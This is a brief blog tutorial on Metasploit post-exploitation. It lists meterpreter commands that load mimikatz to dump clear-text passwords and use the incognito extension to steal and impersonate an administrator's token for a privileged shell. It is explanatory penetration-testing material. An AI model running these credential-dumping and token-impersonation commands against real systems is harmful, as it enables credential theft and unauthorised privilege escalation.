Metasploit: Token Stealing and Incognito

by do son · Published · Updated

Load mimikataz on meterpreter to dump clear text password.

meterpreter>load mimikatz

msv

kerberos

Token Stealing

In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.

load incognito

list_tokens -u

impersonate_token xxxxx\\xxxxxxx

execute -f cmd.exe -i -t

 

 

Tags: incognitometasploitmimikataz